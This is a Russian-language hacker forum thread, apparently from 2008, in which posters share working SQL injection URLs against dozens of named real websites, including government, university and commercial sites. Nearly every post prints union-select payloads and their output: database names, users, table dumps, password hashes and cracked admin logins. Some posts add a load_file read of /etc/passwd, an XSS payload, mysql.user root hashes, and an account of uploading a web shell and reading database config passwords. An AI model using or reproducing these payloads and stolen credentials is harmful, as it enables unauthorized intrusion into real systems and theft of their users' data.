User:cranadb@203.220.25.224
Basename:cranadb

mysql<5.x

sify.com

http://sify.com/news/fullstory.php?id=-14753978+union+select+1,2,3,concat_ws(0x3a,version (),database(),user()),5,6,7,8,9,10,1111111,12,13,1 4,15,16,17,18/*
Version:4.0.18-log
User:spfclogin@202.144.65.151
Basename:cms

flashgamestudio.com

http://flashgamestudio.com/flash_games/flash_games.php?id=-13+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6,7,8,9,10,11,12,13,14,15/*
Version:4.0.27-standard
Basename:dbo2

miraclemileshopslv.com

http://www.miraclemileshopslv.com/restaurants.php?id=-21+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9/*

Version:4.1.25-Debian_mt1
User:db38027@10.1.3.25
Basename:db38027_miracle

shpet.shpet.ru

http://shpet.shpet.ru/site.php?id=-626+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24--
Version:4.1.21-standard-log
User:clclon_user@localhost
Basename:clclon_shpet

novelgames.com

http://www.novelgames.com/flashgames/game.php?id=-22+union+select+concat_Ws(0x3a,version(),user(),da tabase()),2,3,4,5,6,7,8--

Version:4.1.10-log
User:novelgames@localhost
Basename:novelgames

USAkid

14.09.2008, 13:26

www.hirofood.com/catalog/item.php?id=54=null%20union%20all%20select%200,1,2 ,3,4,5,SQL,7,8,9,10,11,12,13,14--

version() => 5.0.27
database() => hiro
user() => ably@localhost

В дополнение:
Там лоад файл робит)))

http://www.hirofood.com/catalog/item.php?id=54=null%20union%20all%20select%200,1,2 ,3,4,5,load_file(0x2f6574632f706173737764),7,8,9,1 0,11,12,13,14-- :)

$n@ke

14.09.2008, 23:48

GOV
http://menominee-nsn.gov/events/eventCalDetail.php?itmNum=3557[sql]
Username: itadmin_mitwus@localhost
Version: 5.0.51a-community
Dbname: itadmin_intranet

около 96 таблиц,но...

ArxWolf

15.09.2008, 04:52

http://www.commercialistifrosinone.com/all_news.php?id=288=null%20union%20all%20select%20 0,1,2,SQL--

version() => 5.0.51a-community
database() => commerci_site
user() => commerci_site@localhost

БД:

commerci_site

Таблицы commerci_site:

livehelp_channels
livehelp_config
livehelp_departments
livehelp_identity_daily
livehelp_identity_monthly
livehelp_keywords_daily
livehelp_keywords_monthly
livehelp_layerinvites
livehelp_leavemessage
livehelp_messages
livehelp_modules
livehelp_modules_dep
livehelp_operator_channels
livehelp_operator_departments
livehelp_operator_history
livehelp_paths_firsts
livehelp_paths_monthly
livehelp_qa
livehelp_questions
livehelp_quick
livehelp_referers_daily
livehelp_referers_monthly
livehelp_sessions
livehelp_smilies
livehelp_transcripts
livehelp_users
livehelp_visit_track
livehelp_visits_daily
livehelp_visits_monthly
news
newsletter

www.curacaodolphintherapy.com/main.php?id=6=null union all select 0,1,SQL,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23

version() => 5.0.37-log
database() => curacaodolphin
user() => curacaodolphindb@localhost

БД:

curacaodolphin

Таблицы curacaodolphin:

fotoalbum
imagelibrary
menuitems
menusubitems
modules
oemp_administrator_activities
oemp_administrator_dashboard
oemp_administrator_emails
oemp_administrator_limits
oemp_administrator_pluginprivs
oemp_administrator_privs
oemp_administrator_shortcuts
oemp_administrators
oemp_archive_list
oemp_archive_list_campaigns
oemp_archive_rss
oemp_archive_rss_campaigns
oemp_asp
oemp_autoresponders
oemp_autoresponders_attachments
oemp_bounce_codes
oemp_bounce_log
oemp_bounce_types
oemp_branding
oemp_campaigns
oemp_campaigns_attachments
oemp_campaigns_clients
oemp_campaigns_cms
oemp_campaigns_cms_refs
oemp_campaigns_content
oemp_campaigns_forward
oemp_campaigns_forward_detailed
oemp_campaigns_labels
oemp_campaigns_linkclicks
oemp_campaigns_linkclicks_detailed
oemp_campaigns_maillists
oemp_campaigns_outbo
oemp_campaigns_rating
oemp_campaigns_rating_detailed
oemp_campaigns_read
oemp_campaigns_read_detailed
oemp_campaigns_rules
oemp_campaigns_schedule
oemp_campaigns_schedule_recursive
oemp_campaigns_smtp
oemp_campaigns_statistics
oemp_campaigns_tracks
oemp_campaigns_unsubscriptions
oemp_clients
oemp_config
oemp_cron
oemp_cron_optreminder
oemp_customfields
oemp_customreports
oemp_emails
oemp_followups
oemp_followups_track
oemp_integration_screens
oemp_labels
oemp_linkclicks
oemp_linkclicks_detailed
oemp_maillist_administrators
oemp_maillist_aliases
oemp_maillist_autoresponders
oemp_maillist_banned
oemp_maillist_blacklist
oemp_maillist_clients
oemp_maillist_customfields
oemp_maillist_emails
oemp_maillist_followups
oemp_maillist_members
oemp_maillist_messages
oemp_maillist_pop3
oemp_maillist_smtp
oemp_maillists
oemp_members
oemp_members_activities
oemp_members_activities_detailed
oemp_news
oemp_news_recipients
oemp_newsletter_templates
oemp_periodicprocesses
oemp_plg0005_emails
oemp_plg0005_maillists
oemp_plg0005_reminders
oemp_plg0005_sendlog
oemp_plg0005_sendreport
oemp_plg0008_translations
oemp_plg0008_translations_board
oemp_plugins
oemp_plugins_contentprocesses
oemp_plugins_processes
oemp_plugins_tags
oemp_pop3_servers
oemp_process_log
oemp_read
oemp_read_detailed
oemp_smtp_servers
oemp_statistics_actions
oemp_tabledependencies
rightarea
team
users [username, password, admin, lastlogin]
vacancies

Twoster

15.09.2008, 14:38

Еще немного:
http://www.ingbretsen.com/print.php?id=-1+union+select+1,2,3,user(),5,6,version()/*user() - ingbretsen@localhost
version () - 5.0.37-log
database() - ingbretsen
http://www.earthenergy.co.uk/news.php?id=-1+union+select+1,2,user(),version(),5,6,database()/* user() - u10037433@lon1-webmysql-1.msh.demon.net
version () - 4.0.30-log
database() - u10037433
http://www.dahlenassociates.com/news.php?id=-1+union+select+1,2,user(),version()/* user() - dahlenassociat@10.2.3.42
version () - 4.1.25-Debian_mt1
database() - dahlenassociates_com_-_dahlenas
http://strangefortune.com/news.php?id=-1+union+select+1,2,3,user(),version(),database()/* user() - strangefortune@localhost
version () - 4.0.20-standard
database() - salo
http://www.eponaclothing.com/news.php?id=-1+union+select+1,user(),database(),version(),5,6,7/* user() - dbo172586143@212.227.127.168
version () - 4.0.27-max-log
database() - db172586143
http://www.tri-shield.co.uk/news.php?id=-1+union+select+1,user(),version()/*
SHOP
user() - trishield@localhost
version () - 5.0.21-standard
database() - trishield_new
http://www.cellosoft.com/ как оказалось баян!
http://www.bangladesh-info.net/view.php?id=-1+union+select+1,user(),version(),database(),5,6,7 ,8/* user() - shahid_shameem@4-Sterling.us.m6.net
version () - 4.0.15-nt
database() - student
(сам сайт защишен авторизацией на ява-скрипте! =) напомнило Античат-квест! (; )

neon_fx

15.09.2008, 14:46

http://www.ciritas.ru/product.php?id=-15+union+select+1,2,3,4,5,67,8,/*
user:ciritas5_website@localhost
version:4.1.22-log
database:ciritas5_ciritas

Fugitif

15.09.2008, 19:45

culturagay ROFL :D

http://www.culturagay.it/cg/schedaLibro.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*

4.0.27-standard-log:Sql10342_1:Sql10342@62.149.130.18

1NtR0

15.09.2008, 23:57

http://moritzlaw.osu.edu/electionlaw/maps/maps.php?ID=69+union+select+1,2,user(),version(),5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26/*

user() - barlow2@www5.it.ohio-state.edu
database() - moritzdb2
version() - 5.0.27

Fugitif

16.09.2008, 02:40

http://www.cairngorms.co.uk/park/visitors/eventsdiary/maps.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a, version(),database(),user()),3,4%20LIMIT%201,1/*

4.1.22-log:cnpa_cairngorms:cnpa_dbuser@localhost

Cennarios

16.09.2008, 03:45

http://priluki.info/cgi-bin/foto.cgi?showgallery=-1+union+select+1,concat_ws(0x3a3a,name,pass,user), 3,4,5,6,7+from+users+limit+0,1

login:OLEX
pass:12321

Хохляцкий портал города Прилуки....

Cennarios

16.09.2008, 16:58

http://www.fuckmachines.de/index.php?page=kategorie&catId=-1+union+select+1,2,concat_ws(0x3a3a,password)+from +admin_user+limit+0,1/*

http://www.fuckmachines.de/admin

не брутится...

Fugitif

16.09.2008, 20:59

http://www.hook.tv/groups.php?id=1%20UNION%20SELECT%20concat_ws(0x3a, version(),database(),user()),2,3%20LIMIT%201,1/*
4.1.22-standard:hook00_hookmstr:hook00_user@localhost

DDoSька

16.09.2008, 22:00

http://www.obereg.ru/zagorod.html?id=1537+union+select+1,2,3,4,5,6,7,8, 9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1/*
Version():4.1.11-standard
User():obereg@localhost
-----
http://sao.mos.ru/?r=9_doc&cat=1+union+select+1,unhex(hex(version())),3
version:4.1.12
user:sao1@chicken
------
http://advertising.koeln-bonn-airport.de/index.php?id=-4+union+select+concat_ws(0x3a,user,password),2+fro m+mysql.user/*
Вывод в титле:
root:32a6457455517e7f
есть доступ в mysql.user

USAkid

17.09.2008, 08:04

грузинский сайт:

http://www.geoimport.ge

http://www.geoimport.ge/index.php?lang=eng&id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at_ws(version(),user(),database()),15,16,17,18,19, 20,21,22,23--

version() - 5.0.51
user() - geoimport_ge@localhost
database() - geoimport_ge

Версия > 5 => есть information_schema:
http://www.geoimport.ge/index.php?lang=eng&id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,tabl e_name,15,16,17,18,19,20,21,22,23+from+information _schema.tables+limit+1,1--

Перебираем лимитом. Видим интересную таблицу:
c_config. Рассматриваем ее тоже лимитом:
http://www.geoimport.ge/index.php?lang=eng&id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,colu mn_name,15,16,17,18,19,20,21,22,23+from+informatio n_schema.columns+where+table_name=0x635f636f6e6669 67+limit+1,1--
Ничего интересного, идем далее.
Приступаем к ее изучению:
http://www.geoimport.ge/index.php?lang=eng&id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,colu mn_name,15,16,17,18,19,20,21,22,23+from+informatio n_schema.columns+where+table_name=0x635f6d656d6265 7273+limit+1,1--
Сразу же находим username. Записываем в память :)
Нашел таблицу c_members, но та бесполезная...
Находим еще кое что интересное: c_users...
Идем далее...
Находим login и password...
Выводим:
http://www.geoimport.ge/index.php?lang=eng&id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at_ws(login,0x3a,password),15,16,17,18,19,20,21,22 ,23+from+c_users--

Result:
admin:geoneo2008

Ну в админке там ваше шелл лить - нет проблем)))

С помощью шелла узнал в конфиге ето:

server: localhost
db_username (and db_name): geoimport_ge
db_pass: x3f5h6a54sdg :)

$n@ke

17.09.2008, 14:22

http://www.edinburghfolkclub.org.uk/giginfo.php?gigID=182UNION+SELECT+1,2,3,4,5,6,7,8, 9,10,11,12,13/*
Dbname: amayze2
Version: 5.0.27-standard-log
Username: amayze2@linweb6.atlas.pipex.net

Snap

17.09.2008, 16:02

http://www.sotovikm.ru

http://www.sotovikm.ru/tovar.php?ID=11023+union+select+1,2,3,4,5,6,7,8,9, 10,concat(table_schema,0x3a,table_name,0x3a,column _name)+from+information_schema.columns--

http://www.sotovikm.ru/tovar.php?ID=11023+union+select+1,2,password,4,5,6 ,7,8,9,10,name+from+auth--

login: admin
Pass: pavel

Cennarios

17.09.2008, 19:38

http://stories.pageforyou.ru/story.php?id=127&id_auth=-1+union+select+concat_ws(0x3a3a,login,password),2, 3+from+authors+limit+0,1/*

Странно пас выводится, или с кодировками залупа или черт пойми что еще....

Pashkela

18.09.2008, 00:29

http://www.kelbike.fr/search.php?q=deda&pmin=&pmax=&brand=&limite=80&ps=&po=&pv=&ls=0&ct=-1/**/UNION/**/SELECT/**/version(),2,3/**/limit/**/1,1/*

5.0.32-Debian_7etch6-log

+ XSS:

http://www.kelbike.fr/search.php?merchantid=118&brand=AVID&ps=%22%3E%3Csсriрt%3Ealert%28%27Pashkela%27%29%3 C%2Fsсriрt%3E%3C%22&po=&pv=&ls=1&pmin=3&pmax=40

bons

18.09.2008, 00:59

Газета Русский Курьер

http://ruscourier.ru/archive.php?id=-1+union+select+database()/*
http://ruscourier.ru/archive.php?id=-1+union+select+user()/*
http://ruscourier.ru/archive.php?id=-1+union+select+version()/*

database() = ruscouru
user() = ruscouru@localhost
version() = 5.0.26-lk-log

запросы выборки из таблиц следует отправлять методом POST, так как некоторые ключевые слова фильтруются хостингом ;). Удобно использовать плагин для firefox: _https://forum.antichat.ru/thread56473.html
от [53x]Shadow

в базе данных есть следующие таблицы:

banners
bigpoll_answ
bigpoll_quest
block
categories
comments
hot
issue
menu
news
points
rubr
sympoll_auth
sympoll_data
sympoll_iplog
sympoll_list
templates

в таблице sympoll_auth такие поля:

uid
user
pass
access
secret

В sympoll_auth 2 записи, выборка содержимого таблицы делается примерно так:

http://ruscourier.ru/archive.php?id=-1+union+select+user+from+sympoll_auth+where+uid=1+ limit+1/*
http://ruscourier.ru/archive.php?id=-1+union+select+pass+from+sympoll_auth+where+uid=1+ limit+1/*
http://ruscourier.ru/archive.php?id=-1+union+select+secret+from+sympoll_auth+where+uid= 1+limit+1/*

соответсвенно и для uid=2

Содержимое таблицы sympoll_auth:

user:ruscouru
pass:19635f485c127dc207f32fa1e2157779:ufptnf
secret:db447e070183f8b93ddc30b7a1d2472b:1203592175
access:

user:ruscour
pass:9c47efd296e2d077273e01df82314736:flvbyrf
secret:61e598f9762fd92e568b8334f0498476:1205516158
access:1

(хэши md5)
можно заметить что ufptnf в русской раскладке "газета" а flvbyrf - "админка". Для чего предназначено поле secret пока не очень понятно.

по этому адресу скорее всего расположена админка
_http://ruscourier.ru/admin
с HTTP-авторизацией.
к сожалению никакие пароли и их комбинации с полем secret к ней не подходят.
Может у кого-то получится больше.

Twoster

18.09.2008, 11:55

Вот еще кучка свеженьких!

http://www.ctbinc.com/news.php?news_id=-1+union+select+1,user(),version(),4,5/*
user() - ctbinc@localhost
version() - 4.1.19
database() - ctbinc
http://www.grandmasterrecords.com/news.php?news_id=-1+union+select+1,2,user(),database()--
user() - grandmas_user@localhost
version() - 5.0.51a-community
database() - grandmas_db

http://thefroehlichs.org/news.php?news_id=-1+union+select+1,version(),database(),4,5/*
user() - celeste_admin@76.162.254.221
version() - 4.1.22-standard
database() - celeste_thefroehlichs
http://www.timperleyband.com/news.php?news_id=-1+union+select+1,2,3,user(),5,version(),database() ,8/*
user() - bandman_timperle@localhost
version() - 4.1.19
database() - bandman_timperley
http://www.tilesrx.com/news.php?news_id=-1+union+select+1,2,3,4,5,6,user(),version(),9,data base()/*
user() - ann@localhost
version() - 4.0.12-log
database() - tilesrx
http://www.ulfcar.se/news.php?mode=read&type=Case%20News&news_id=-1+union+select+1,user(),3,version(),5,6,7,8,9/*
user() - ulfcar@web10
version() - 4.0.24-nt-max
database() - ulfcar
http://www.kino.com/video/news.php?news_id=-1+union+select+1,2,3,4,5,6,user()/*
user() - kino@lma671.siteprotect.com
version() - 4.0.12-standard
database() - kino
http://www.capsi.ca/news.php?news_id=-1+union+select+1,email,password,4+from+members+lim it+1,10/*
http://www.bearcat.com.au/news.php?action=show&news_id=-1+union+select+user(),version(),3/*
user() - bearcat2@localhost
version() - 4.0.24_Debian-10sarge2
database() - bearcat2
http://thedentalcarecenter.com/news.php?news_id=-1+union+select+1,2,user(),4,version(),6,7,8,9,10,1 1,12,13/*
user() - dentalcare@silverpine.forest.net
version() - 5.0.20a-max-log
database() - thedentalcarecenter
http://www.alberguscatering.com/news.php?news_id=-1+union+select+1,version(),3,database(),5,6,7,8,9, 10/*
user() - albergus@216.157.37.225
version() - 4.0.24-nt
database() - albergus
http://www.cbcpharma.com/news.php?news_id=-1+union+select+1,password,username,4,5+from+users+ limit+1,1/*
user() - cbcphar@localhost
version() - 4.1.20-log
database() - cbcphar
http://www.ee22.com/eng/news.php?action_type=detail&news_id=-1+union+select+1,2,3,email,5,password,7,8,9,10,11, 12,13,14+from+member+limit+1,1--
user() - ee22@210.245.166.92
version() - 5.0.51a
database() - ee22

http://www.circletechfl.com/news.php?news_ID=-1+union+select+1,2,version(),4,user(),6,7,8/*
user() - CircleTechFl@68.178.211.40
version() - 4.0.27-max-log
database() - CircleTechFl

Некоторые из них магазины, в некоторых есть админки, некоторые просто так, для изучения! =)

R1dex

18.09.2008, 22:38

http://www.fuckmachines.de/index.php?page=kategorie&catId=-1+union+select+1,2,concat_ws(0x3a3a,password)+from +admin_user+limit+0,1/*

http://www.fuckmachines.de/admin

не брутится...

Вот что получилось...

admin : 5d2167c87d363636
OHM 2007 : 0643078c5a5c0f3b

Сайт топ гильдии в игре Rfonline.

http://www.chaos-online.ru/?action=read_news&id=-1+union+select+1,2,3--

Snap

19.09.2008, 17:14

Сайт топ гильдии в игре Rfonline.

http://www.chaos-online.ru/?action=read_news&id=-1+union+select+1,2,3--

В добавку к выше указанным!

http://www.chaos-online.ru/?action=read_news&id=-1+union+select+1,2,concat(table_schema,0x3a,table_ name,0x3a,column_name)+from+information_schema.col umns+limit+628,1--

http://www.chaos-online.ru/?action=read_news&id=-1+union+select+1,concat(converge_id,0x3a,converge_ pass_hash,0x3a,converge_pass_salt),3+from+forum.cf _members_converge+limit+1,1--

http://www.chaos-online.ru/?action=read_news&id=-1+union+select+1,concat(id,0x3a,name,0x3a,email),3 +from+forum.cf_members+limit+1,1--

Fugitif

19.09.2008, 17:26

http://www.evangelici.net/links/?viewCat=1%20UNION%20SELECT%20concat_ws(0x3a,versi on(),database(),user()),2/*
4.1.22:phpHoo:ind_admin@localhost
http://www.e-romanticos.com/autor.php?id=1%20UNION%20SELECT%20concat_ws(0x3a,v ersion(),database(),user()),2,3,4,5,6,7,8/*
4.1.20:noeganet_inmoastur:noeganet_lady@localhost
http://www.anycorp.com/any/magazine.php?id=1%20UNION%20SELECT%201,2,concat_ws (0x3a,version(),database(),user()),4,5%20LIMIT%201 ,1/*
4.0.24-log:any:any@localhost

AFoST

19.09.2008, 20:29

http://psyforum.ru/pssite/article_list.php?id=-1)+union+select+1,2,3,convert(concat(user(),0x20,d atabase(),0x20,version())+using+cp1251)/*

ArxWolf

20.09.2008, 03:17

http://reno.broowaha.com
http://reno.broowaha.com/profile.php?id=1516=null%20union%20all%20select%20 0,1,2,3,4,5,6,7,concat(version(),0x7c,database(),0 x7c,user()),9,10,11,12,13,14,15,16,17,18--

version() => 4.0.27-standard-log
database() => db162098511
user() => dbo162098511@74.208.16.88

http://employmenttimesonline.com
http://www.employmenttimesonline.com/companies/profile.php?ID=93=null%20union%20all%20select%200, 1,2,3,4,concat(version(),0x3c62723e,database(),0x3 c62723e,user()),6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25--

version() => 4.0.16-standard
database() => employ_et1m3s
user() => employ_employ@localhost

http://www.noborder.org
http://www.noborder.org/item.php?id=372=null%20union%20all%20select%200,1, concat(version(),0x3c62723e,database(),0x3c62723e, user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26--

version() => 4.1.22
database() => nob
user() => paul@localhost

http://www.dramapod.com

http://www.dramapod.com/item.php?catid=139=null union all select 0,concat(version(),0x3c62723e,database(),0x3c62723 e,user())--

version() => 5.0.51a-community
database() => dramapod_live
user() => dramapod_dpuser@localhost

БД:

dramapod_live

Таблицы dramapod_live:

dp_reviews[item, rstatus, rip, rname, remail, rurl, rrating, review, reviewdate]
dp_status[desc]
dp_users[uname, pass]
dp_views[item, ip, viewdate, processed]
dp_votes[voter, item, rating, votedate, processed]

FAPSI

20.09.2008, 22:48

Залил скрипт - можно пошариться по серваку :)
http://www.geoimport.ge/uploads/dir.php?cd=./../../doc/admin

mefish

20.09.2008, 23:23

Залил скрипт - можно пошариться по серваку :)
http://www.geoimport.ge/uploads/dir.php?cd=./../../doc/admin

Ща тебя пошарят немного.
Ты читал как раздел называеться ? :D
Тут ток скуль иньекцыи, а шелы, фтп и прочая гадость в разделе Халява :rolleyes:

3xIm3

21.09.2008, 08:37

_http://www.globalsmokefreepartnership.org/news.php?id=251+order+by+4/*
_http://www.globalsmokefreepartnership.org/news.php?id=999999+UNION+SELECT+1,2,3,4/*
_http://www.globalsmokefreepartnership.org/news.php?id=999999+UNION+SELECT+1,version(),3,4/*
4.1.22
_http://www.globalsmokefreepartnership.org/news.php?id=999999+UNION+SELECT+1,2,3,4+from+membe rs/*

_http://www.globalsmokefreepartnership.org/news.php?id=999999+UNION+SELECT+1,username,email,p assword+from+members+limit+356,2/*

-=Static=-

21.09.2008, 14:27

Новая социальная сеть книголюбов BookMix.ru

Предистория: Сижу както на работе днем. Делать особо нечего. Почитываю новости, и натыкаюсь на интересный заголовок "Открылась социальная сеть книголюбов BookMix.ru".
Думаю а дайка посмотрю, че за сеть то?))
Захожу, вижу новости...в строке передается id. Первая мысль - SQL-Inj. И опа...вуоля!)))) Действительно инъект. Нехитрыми манипуляциями подбираю столбцы.

http://bookmix.ru/news/index.phtml?id=-48+union +select+1,2,3,4,5, 6,7,8,9,10,11/*

USER(): bookmix@localhost
DATABASE(): bookmix
VERSION(): 5.0.22

Есть доступ до information_schema, а посему поковырял таблицы, есть 2 интересные, с полями соответсвенно:

admins
-user_id
-name
-login
-pass

users
-user_id
-name
-login
-pass
-email
-icq
-skype
-description
-birthday
-showage
-sex
-phone
-howtohear
-photo
-photo_tn
-photo_tn2
-status
-regdate
-logged
-lastvisit
-referrer
-privatemessagesnotification
-friends
-reviews
-comments
-online
-regcode
-read
-ireadadddate

admins
1: pechatnick: pechatnick: 7ac2262d4ca6e2de63094a51225b00ee (stroka)

У кого есть желание, ковыряйте дальше))

USAkid

21.09.2008, 14:53

-=Static=-, добил сайтег:

Админка тут - http://bookmix.ru/_admin/
pechatnick:stroka

Кстати много интересного :)

groupby

21.09.2008, 22:06

Интересный сайт очень. Инъекцию обнаружил сразу, но там какая-то хитрая защита судя по всему имеется. В общем попробуйте:

http://web.anir.mn/modules.php?name=News&file=article&sid=-99%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,1 3,14/*

все кроме цифр режется почему-то. Ни одну функцию заюзать не могу. :(

groupby

21.09.2008, 22:46

Вот ещё сайтег. При возникновении ошибки SQL выдает довольно подробный отчет по ошибке :D
Но внутрь я залезть что-то не смог (

http://www.boreme.com/members/viewviral.php?viral_id=18891%20union%20select%201, 2,3,4,5,6,7,8,9,10,11,12/*&siteid=55336

n3m0

22.09.2008, 00:03

http://tid.odessa.ua/news/?newsid=-1+union+select+version(),database(),3,user(),5/*

http://tid.odessa.ua//action/?action_id=-1+union+select+version(),2,3,4/*

http://www.ods.com.ua/index2.phtml?chapter=-1+union+select+version()/*&sub=-1

Ничего интересного нету

groupby

22.09.2008, 00:45

Вот ещё сайтик. Сразу с мемберами выложил :cool:

http://englishspectrum.net/jobkorea/findpeople.html?include=form&mode=view&id=-99 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,member _id,temp_passwd,54,55,56,57,58,59,60,61,62,63,64,6 5,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81, 82,83,84,85,86 from english_member limit 1,1/*&lc=&sc=&mc=&pp=&gid=1&&&search_YN=Y

Pashkela

22.09.2008, 02:31

http://www.bestonlinevalue.com/upgrade.php?ucat=-1086/**/union/**/select/**/1,22,23,24,column_name,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55/**/from/**/information_schema.columns+where+table_name=0x7061 7970616C5F636172745F696E666F+limit+0,1--

Pashkela

22.09.2008, 02:42

Интересный сайт очень. Инъекцию обнаружил сразу, но там какая-то хитрая защита судя по всему имеется. В общем попробуйте:

http://web.anir.mn/modules.php?name=News&file=article&sid=-99%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,1 3,14/*

все кроме цифр режется почему-то. Ни одну функцию заюзать не могу. :(

http://web.anir.mn/modules.php?name=News&file=article&sid=-99%20union%20select%201,2,3,0x76657273696F6E2829,0 x76657273696F6E2829,0x404076657273696F6E,7,8,0x766 57273696F6E2829,10,11,12,13,14/*

подстава одназначно

LUKAC

22.09.2008, 02:57

http://www.rionews.com.ua/statja.php?id=11175+union+select+version(),2,3,4,5 ,6,7,8,9,0,1/*

4 версия

groupby

22.09.2008, 10:41

http://web.anir.mn/modules.php?name=News&file=article&sid=-99%20union%20select%201,2,3,0x76657273696F6E2829,0 x76657273696F6E2829,0x404076657273696F6E,7,8,0x766 57273696F6E2829,10,11,12,13,14/*

подстава одназначно

С чего вдруг???
Если ты написал version() в 16ричном виде, то это уже не version(), а строка version(). тут никакой подставы. Тут фишка в другом совсем.
В других местах все параметры экранируются. Пробой только в этом месте. Вероятно CMS, на которой построен портал сначала сама обрабатывает урлы (режет лишнее и подозрительные слова), а потом передает дальше, в бажные скрипты ))). Скорее всего это можно обойти, но у меня вариантов пока нет.

bons

22.09.2008, 11:47

Интересный сайт очень. Инъекцию обнаружил сразу, но там какая-то хитрая защита судя по всему имеется. В общем попробуйте:
http://web.anir.mn/modules.php?name=News&file=article&sid=-99%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,1 3,14/*
все кроме цифр режется почему-то. Ни одну функцию заюзать не могу.

там php-nuke 6 версии, вот так можно выдрать логины хэши админов:

http://web.anir.mn/modules.php?name=News&file=article&sid=-99+union+select+1,2,3,4,pwd,aid,7,8,9,10,11,12,13, 14+from+nuke_authors+limit+0,1/*
http://web.anir.mn/modules.php?name=News&file=article&sid=-99+union+select+1,2,3,4,pwd,aid,7,8,9,10,11,12,13, 14+from+nuke_authors+limit+1,1/*
...

baska:d88e1207b4f325297ef25cb2b049b33b:
bete:217de01e5b8aad8ce45d75ddaa2a27a9:
eegiiz:4846eaa06bfc1fa22df6ebce7f390cc7:
aliye:aa70fea8443ea26ca24d204069147b71:
hehe:e10adc3949ba59abbe56e057f20f883e:123456

ilinsky

22.09.2008, 12:06

Доброе утро. http://sotka.ru/

Вот то что вытянул из базы (MSSQL)

NastrSet
infobj
NastrPhones
NastrList
Archive
History
Right_List
TV_Program
TreeList
Accessuars
accessuars_name
Hard
AllBase
History_Archive
Statii_Rubrics
AllPhone
Black_List
City
Instr
Constants
Statii_in_rubrics
sessions
>session_id
>session_user_id
>session_start
>session_time
>session_ip
>session_logged_in
>session_admin
Credits
sessions_keys
Glossary
TV_Picture
GuestBook
Jurnal
TV_Mistake
Jurnal_CFG
TV_Announce
Pictures
Mailer
Statii
Mailer_Log
Mistakes
Money
>id
>data
>num_subj
>num_credit
>credit
>in_out
>num_disp
Sotovik_Err
Digital_Tech
Operators
Pagers
Phones_S
RestrictedPhones
Users_contacts
Users_right
>id_user_rights
>id_rights_info
Users_rights_info
>id_right
>right_maxmess
>right_info
Users_list
>user_id
>user_active
>username
>user_password
>user_session_time
>user_lastvisit
>user_regdate
>user_email
>user_newpasswd
>user_notify
>user_regphone

Юзер с Id = 1 Это гость. С id=2 похоже на админа
Имя БД: Cotka
логин: Andre
хэш: 24f64722693735931efd98aa4bb37e9b

Скуль : http://sotka.ru/BS/view.asp?nm=SQLINJ

Также "Админка" http://sotka.ru/admin/
похоже ищет в таблице сессий ( вот тут session_admin) прежде чем пустить.

Вопрос вот такой: Там имеется табличка сессий, с соответствующими столбиками

Кто догадается как сделать UPDATE/INSERT ?
У меня не получается пока что

groupby

22.09.2008, 12:33

Пароль юзера Andre: paradis

Насколько я знаю, внтури селекта ни Апдейт ни Инсерт невозможно выполнить. По крайней мере в мускуле

ilinsky

22.09.2008, 12:43

Пароль юзера Andre: paradis

Насколько я знаю, внтури селекта ни Апдейт ни Инсерт невозможно выполнить. По крайней мере в мускуле

Ну это и не мускуль -) А пароль мне ничего не дал -(
Делов том что залогинившись и пойдя в админку меня выкинуло! Хотя вчера когда я залогинен небыл, на ее индекс меня пускало...

ilinsky

22.09.2008, 15:21

http://www.cotraj.ru

Скуль http://www.cotraj.ru/catalog.php?cat=1{SQLINJ}

Database Version: 4.0.26
Database name: wwwcotrajru
User name: cotraj@yox.hc.ru

information_schema не пустили, имя таблиц узнать не удалось,хостер рбк

luz3r

22.09.2008, 16:28

http://www.cotraj.ru

Скуль http://www.cotraj.ru/catalog.php?cat=1{SQLINJ}

Database Version: 4.0.26
Database name: wwwcotrajru
User name: cotraj@yox.hc.ru

information_schema не пустили, имя таблиц узнать не удалось,хостер рбк
Очень содержательная скуль...кол-ва столбцов нет , с каких пор в 4.0.26 существует таблица information_schema ? =\ Она есть в версиях >5

SWAT

22.09.2008, 16:54

http://www.terrorism.com/index.php?catid=-1+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,1 2,13,version(),15,16,17,18,19,20--

Pashkela

22.09.2008, 22:26

Это к посту выше через пост:)

http://www.cotraj.ru/catalog.php?cat=1/**/union/**/select/**/version()/**/limit/**/1,1/*

user - cotraj@yox.hc.ru
database - wwwcotrajru

spherics

23.09.2008, 01:31

http://vnorilske.ru/index.php?page_id=40&fi_sex=1%20union%20select%20version(),user(),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,database(),20, 21,22,23/*&f_online=1

Версия 5.0.45-community-nt-log
Пользователь eleonora65465RT@localhost
База knopotuska

SWAT

23.09.2008, 08:47

nasa.gov

